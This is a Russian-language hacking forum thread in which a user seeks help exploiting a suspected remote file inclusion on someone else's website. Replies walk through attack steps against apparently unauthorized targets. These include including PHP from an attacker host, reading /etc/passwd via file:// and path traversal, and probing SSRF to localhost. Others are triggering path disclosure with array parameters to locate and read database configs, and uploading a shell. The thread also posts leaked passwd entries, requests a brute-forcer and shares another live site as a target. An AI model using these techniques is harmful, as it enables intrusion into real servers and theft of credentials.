File include[помощь]

Discussion in 'Песочница' started by sinfo, 11 Oct 2016.

  1. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Так и должно быть.. Ну не совсем может там не инклуд вовсе
     
  3. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    Ну а как мне увидить phpinfo атакуемого сайта?
     
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    а зачем тебе phpinfo атакуемого сайта?
    вопрос вообще про инклуд сначала был
    /etc/shells /etc/passwd по классике попробуй проинклудить
     
    _________________________
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Так если у него инклуд нахрена это всё,тем более если РФИ
     
    pas9x likes this.
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    site.com/blablabla=
    site=i.txt

    в i.txt <?php phpinfo();?>
    а что если, file:///etc/passwd || http://127.0.0.1:80
     
  7. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    в i.txt <?php phpinfo();?> - открыл как текстовый тхт.
    file:///etc/passwd || http://127.0.0.1:80 - нет результатов(((
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    тогда это не инклуд
     
  9. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    так ты файл читать можешь локальный?
    file:///etc/passwd
    /blablabla=../etc/passwd
     
  10. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    file:///etc/passwd да вот только что нашел,ток в другом месте
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh


    /etc/group
    crontab:x:102:
    Debian-exim:x:103:
    mlocate:x:104:
    ssh:x:105:

    А есть брут??работающий с post запросами?
     
    #10 sinfo, 11 Oct 2016
    Last edited: 11 Oct 2016
  11. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    585
    Reputations:
    52
    Просто залей на hack.ru файл phpcode.txt с содержимым <?php echo 'okay dude'; ?> и открой в браузере site.com/blablabla=phpcode.txt . Если в странице будет присутствовать только "okay dude" то значит это реально рабочий RFI и осталось только залить шелл. Если в страницу будет тупо включено содержимое phpcode.txt вместе с тегами <?php то это не RFI а банальный file_get_contents. Хотя и с помощью него можно попробовать что-нибудь сделать, например прочитать конфиг сайта с паролем к БД.
    Но перед тем как тыкать неизвестно куда неизвестно что я рекомендую тебе выучить пхп, иначе ты нуб :)
     
  12. korneev

    korneev New Member

    Joined:
    24 Aug 2016
    Messages:
    13
    Likes Received:
    3
    Reputations:
    2
    На самом деле больше похоже на XSRF. Т.е. сервер site.com получает URL, идет по нему, забирает контент и отдает его уже тебе.

    посмотри в логах своего веб сервера на hack.com с каким юзер-агентом он приходит к тебе. можно попробовать в ответ на запрос ему отдать 401-й код - вдруг прилетят авторизационные данные. Если бы была винда - смог бы отрелеиться.
     
    BabaDook likes this.
  13. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то
     
    #14 BabaDook, 12 Oct 2016
    Last edited: 12 Oct 2016
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    вот вот("и зачем читать passwd когда у него RFI?")
    тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents

    "На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"
    да ладно, вчера такую нашел, просто искать надо :) правда там не lfi а чтение файлов через fopen, но всё же

    тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт
     
    _________________________
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    нуу лень она двигатель типа))
    http://dantant.com/proxy/miniProxy.php/http://google.com/
    для примера, прокся типа, хотя по факту читалка файлов :) сам ещё толком не крутил, там какая то свалка на домене)
     
    _________________________
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Живого места на том сайте нету, инклуд нашёл, и заливку файлов, но версия пхп высокая

    И много таких прикольных моментов. Но почему я только сейчас стал обращать на это внимания


    п.с спасибо за сыль, будет чем заняться на досуге
     
    #18 BabaDook, 12 Oct 2016
    Last edited: 12 Oct 2016
  19. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Кидай таргет в ЛС.
     
    _________________________
  20. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    Значит смотри, если у тебя получилось прочитать локальный файл, ищи раскрытие путей например
    пост в авторизации
    site.com/login
    post data
    login[]=lol
    дает нам /var/www/site.com/public_html/lol/db.php error 31 line
    тогда мы имеем следующую возможность чтения
    file:///var/www/site.com/public_html/index.php
     
Loading...